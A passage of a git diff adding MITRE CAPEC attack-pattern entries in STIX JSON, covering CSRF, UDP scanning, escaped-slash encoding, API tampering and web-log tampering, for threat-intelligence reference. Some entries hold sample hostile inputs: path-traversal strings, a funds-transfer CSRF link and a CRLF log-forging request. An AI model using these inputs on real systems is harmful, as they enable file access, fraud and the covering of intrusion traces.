"http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Remote Services", + "external_id": "T1021", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1021" + }, + { + "description": "Email Collection:Remote Email Collection", + "external_id": "T1114.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1114/002" + }, + { + "description": "External Remote Services", + "external_id": "T1133", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + } + ], + "id": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Remote Services with Stolen Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.", + "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json new file mode 100644 index 0000000000000000000000000000000000000000..7a411b9c8c627c0cbc83965568dc34987470716e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--cee023f2-c55a-4990-af22-b1cfd1339809", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-13 : Subverting Environment Variable Values\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-264", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/264.html" + } + ], + "id": "attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Environment Variable Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json new file mode 100644 index 0000000000000000000000000000000000000000..bf3e79366cfe219bb71cf6fbbdd5269995fc7361 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json @@ -0,0 +1,87 @@ +{ + "id": "bundle--a1499a54-37b0-4182-bba4-af7daf538b10", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in UDP scanning to gather information about UDP port status on the target system. UDP scanning methods involve sending a UDP datagram to the target port and looking for evidence that the port is closed. Open UDP ports usually do not respond to UDP datagrams as there is no stateful mechanism within the protocol that requires building or establishing a session. Responses to UDP datagrams are therefore application specific and cannot be relied upon as a method of detecting an open port. UDP scanning relies heavily upon ICMP diagnostic messages in order to determine the status of a remote port.", + "external_references": [ + { + "external_id": "CAPEC-308", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC768 - User Datagram Protocol, 1980--08---28", + "external_id": "REF-158", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc768.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6", + "modified": "2022-02-22T00:00:00.000Z", + "name": "UDP Scan", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ca34308-a8e4-40b6-becd-3ff95bac628a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. An adversary sends UDP packets to target ports.

  2. An adversary uses the response from the target to determine the port's state. Whether a port responds to a UDP packet is dependant on what application is listening on that port. No response does not indicate the port is not open.

", + "x_capec_extended_description": "\n During a UDP scan, a datagram is sent to a target port. If an 'ICMP Type 3 Port unreachable' error message is returned then the port is considered closed. Different types of ICMP messages can indicate a filtered port. UDP scanning is slower than TCP scanning. The protocol characteristics of UDP make port scanning inherently more difficult than with TCP, as well as dependent upon ICMP for accurate scanning. Due to ambiguities that can arise between open ports and filtered ports, UDP scanning results often require a high degree of interpretation and further testing to refine. In general, UDP scanning results are less reliable or accurate than TCP-based scanning.\n ", + "x_capec_prerequisites": [ + "The ability to send UDP datagrams to a host and receive ICMP error messages from that host. In cases where particular types of ICMP messaging is disallowed, the reliability of UDP scanning drops off sharply." + ], + "x_capec_resources_required": [ + "The ability to craft custom UDP Packets for use during network reconnaissance. This can be accomplished via the use of a port scanner, or via socket manipulation in a programming or scripting language. Packet injection tools are also useful. It is also necessary to trap ICMP diagnostic messages during this process. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f.json new file mode 100644 index 0000000000000000000000000000000000000000..62076d0097ff5d511a80409d43a2684460b4ee4c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f.json @@ -0,0 +1,125 @@ +{ + "id": "bundle--8bd4aa5d-8297-4c2e-9d55-8a812269388d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.", + "external_references": [ + { + "external_id": "CAPEC-78", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Escaped Slashes in Alternate Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n For example, the byte pair \\0 might result in a single zero byte (a NULL) being sent. Another example is \\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:\n / yields /\\/ yields /\n ", + "\n An attack leveraging escaped slashes in slternate encodings is very simple. If you believe the target may be filtering the slash, attempt to supply \\/ and see what happens. Example command strings to try out include\n CWD ..\\/..\\/..\\/..\\/winnt\n which converts in many cases to\n CWD ../../../../winnt\n To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet\n int main(int argc, char* argv[]){puts(\"\\/ \\\\ \\? \\. \\| \");return 0;\n }\n produces the output\n / \\ ? . |\n Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:\n CWD ..\\?\\?\\?\\?\\/..\\/..\\/..\\/winntCWD \\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/winntCWD ..\\|\\|\\|\\|\\/..\\/..\\/..\\/winnt\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts to escape multiple different special characters using a backslash.

    2. Techniques
    Escape a special character with a backslash to bypass input validation.
    Try different encodings of both the backslash and the special character to see if this bypasses input validation

Exploit

  1. Manipulate input: Once the adversary determines how to bypass filters that filter out special characters using an escaped slash, they will manipulate the user input in a way that is not intended by the application.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts the backlash character as escape character.", + "The application server does incomplete input data decoding, filtering and validation." + ], + "x_capec_skills_required": { + "Low": "The adversary can naively try backslash character and discover that the target host uses it as escape character.", + "Medium": "The adversary may need deep understanding of the host target in order to exploit the vulnerability. The adversary may also use automated tools to probe for this vulnerability." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json new file mode 100644 index 0000000000000000000000000000000000000000..088ed04ddbd34c3d64a2a57b4a13dcc51935d870 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json @@ -0,0 +1,116 @@ +{ + "id": "bundle--d6793b84-bf51-4140-ae4a-d716cdcc2a04", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.", + "external_references": [ + { + "external_id": "CAPEC-62", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/62.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1275", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1275.html" + }, + { + "description": "Cross-Site Request Forgery", + "external_id": "09", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Cross-Site-Request-Forgery" + }, + { + "description": "Cross Site Request Forgery (CSRF)", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/csrf" + }, + { + "description": "Thomas Schreiber, Session Riding: A Widespread Vulnerability in Today's Web Applications, SecureNet GmbH", + "external_id": "REF-62", + "source_name": "reference_from_CAPEC", + "url": "https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-602", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.html" + } + ], + "id": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Cross Site Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Session Riding" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.\n The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.\n The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore target website: The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.

    2. Techniques
    Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server
    Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server
    View HTML source of web pages that contain links or buttons that perform actions of interest.

Experiment

  1. Create a link that when clicked on, will execute the interesting functionality.: The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.

    2. Techniques
    Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)
    Create a form that will submit a POST request (e.g.

Exploit

  1. Convince user to click on link: Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.

    2. Techniques
    Execute a phishing attack and send the user an e-mail convincing them to click on a link.
    Execute a stored XSS attack on a website to permanently embed the malicious link into the website.
    Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.
    Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4" + ], + "x_capec_resources_required": [ + "All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json new file mode 100644 index 0000000000000000000000000000000000000000..c0bef7434abd09b8bb9e15355a042ce2068d2257 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json @@ -0,0 +1,49 @@ +{ + "id": "bundle--272b9f71-5a7e-4a9a-8727-fa360a5f0b11", + "objects": [ + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.", + "external_references": [ + { + "external_id": "CAPEC-583", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/583.html" + }, + { + "description": "Analysis of Country-wide Internet Outages Caused by Censorship, 2011, Center for Applied Internet Data Analysis", + "external_id": "REF-464", + "source_name": "reference_from_CAPEC", + "url": "http://www.caida.org/publications/papers/2011/outages_censorship/outages_censorship.pdf" + } + ], + "id": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Disabling Network Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Hardware" + ], + "x_capec_prerequisites": [ + "The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json new file mode 100644 index 0000000000000000000000000000000000000000..cb1b84c70c49dad9f4c610e1703a880f83969e6c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json @@ -0,0 +1,73 @@ +{ + "id": "bundle--8924dda7-20e5-4f60-9831-a2178ac7bdba", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.", + "external_references": [ + { + "external_id": "CAPEC-385", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Transaction or Event Tampering via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications (CAPEC-94) between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json new file mode 100644 index 0000000000000000000000000000000000000000..5d4cfef63c443f2387c4dd6055fdd51e89e6ead7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json @@ -0,0 +1,110 @@ +{ + "id": "bundle--5c591659-08e1-4f18-8ae3-34dd0bf6502a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \"Log Injection-Tampering-Forging\" except that in this case, the attack is targeting the logs of the web server and not the application.", + "external_references": [ + { + "external_id": "CAPEC-81", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/81.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/279.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Server Logs Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application Web Server Log File Format: The attacker observes the system and looks for indicators of which logging utility is being used by the web server.

    2. Techniques
    Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information.

Experiment

  1. Determine Injectable Content: The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.

    2. Techniques
    Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

    2. Techniques
    \n Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    Directly through log file or database manipulation, modify existing log entries.
